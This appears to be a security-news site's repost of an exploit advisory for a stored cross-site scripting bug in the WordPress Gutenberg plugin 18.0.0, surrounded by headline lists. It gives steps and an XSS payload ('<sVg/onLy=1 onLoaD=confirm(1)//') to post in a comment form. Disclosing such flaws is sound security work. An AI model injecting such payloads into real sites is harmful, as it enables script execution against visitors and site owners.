Home Tools Exploits & CVE's WordPress Gutenberg 18.0.0 Cross Site Scripting

WordPress Gutenberg 18.0.0 Cross Site Scripting

April 2, 2024

170

Authored by tmrswrr

WordPress Gutenberg plugin version 18.0.0 suffers from a persistent cross site scripting vulnerability.

## Exploit Title: WordPress Gutenberg Plugin Version 18.0.0 Stored XSS
### Date: 2024-3-29
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://wordpress.org/plugins/gutenberg/
### Version 18.0.0


1 ) Go to Gutenberg Plugin edit page : https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-4
2 ) Write Leave a Reply  place your payload :
<sVg/onLy=1 onLoaD=confirm(1)//
3 ) After save will be see alert button

WordPress Gutenberg 18.0.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Risky Biz News: Microsoft ties security goals to executive compensation

osCommerce 4 Cross Site Scripting

undefinedExploiting The NT Kernel In 24H2undefined

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Cisco RV Authentication Bypass / Code Execution

Trojan-PSW.Win32.PdPinch.gen Denial Of Service

Telegram On macOS TCC Bypass